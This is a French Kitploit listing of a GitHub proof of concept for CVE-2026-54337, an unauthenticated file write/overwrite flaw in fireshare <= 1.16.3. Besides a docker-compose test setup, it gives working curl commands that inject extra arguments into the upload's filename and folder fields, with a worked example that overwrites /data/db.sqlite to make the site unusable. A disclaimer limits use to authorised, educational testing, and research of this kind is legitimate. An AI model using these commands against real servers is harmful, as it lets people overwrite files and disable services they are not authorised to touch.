Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-54337-PoC — CVE-2026-54337 - PoC d'écriture/remplacement de fichier non authentifié pour fireshare <= 1.16.3 | Kitploit
Outils/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - PoC d'écriture/remplacement de fichier non authentifié pour fireshare <= 1.16.3

Voir le dépôt
2il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-54337 PoC

CVE-2026-54337 - Écriture/Remplacement de fichier non authentifié dans fireshare <= 1.16.3 PoC

Pour plus d'informations, veuillez vous référer à cet avis GitHub

Configuration

  • Veuillez utiliser le docker-compose.yml suivant pour tester
root@kitploit:~
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Ephemeral storage (discarded when container stops)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

Exploit

  • Étape 1 : Créez un fichier quelconque tant que vous le nommez avec l'extension .mp4, par exemple
root@kitploit:~
$ echo 123 > test.mp4
  • Étape 2 : Exécutez la commande curl suivante (assurez-vous de modifier le placeholder)
root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

Par exemple, pour remplacer /data/db.sqlite, vous changerez la commande comme suit

root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

Note

  • Étant donné que par défaut, le service est exécuté sous l'utilisateur nginx, qui n'a accès qu'à /data, /processed, /images et /videos, vous ne pouvez donc y écrire/remplacer que des fichiers.
  • Pour cette raison, à mon avis, le remplacement de /data/db.sqlite a le plus grand impact car il rendra le site web inutilisable.

Avertissement

  • Cette preuve de concept (PoC) est fournie uniquement à des fins éducatives, de recherche et de sécurité défensive.
  • L'auteur n'est pas responsable de toute mauvaise utilisation, tout dommage, tout accès non autorisé, toute interruption de service, toute perte de données ou toute conséquence juridique résultant de l'utilisation de ce code.
  • Les utilisateurs sont seuls responsables de veiller à respecter toutes les lois, réglementations et exigences d'autorisation applicables avant d'utiliser cette PoC.
  • Cette PoC ne doit être exécutée que sur des systèmes pour lesquels vous avez une autorisation explicite de test. Les tests non autorisés de systèmes peuvent être illégaux et contraires à l'éthique.
  • En utilisant ce logiciel, vous reconnaissez que vous le faites à vos propres risques.
Télécharger l’outil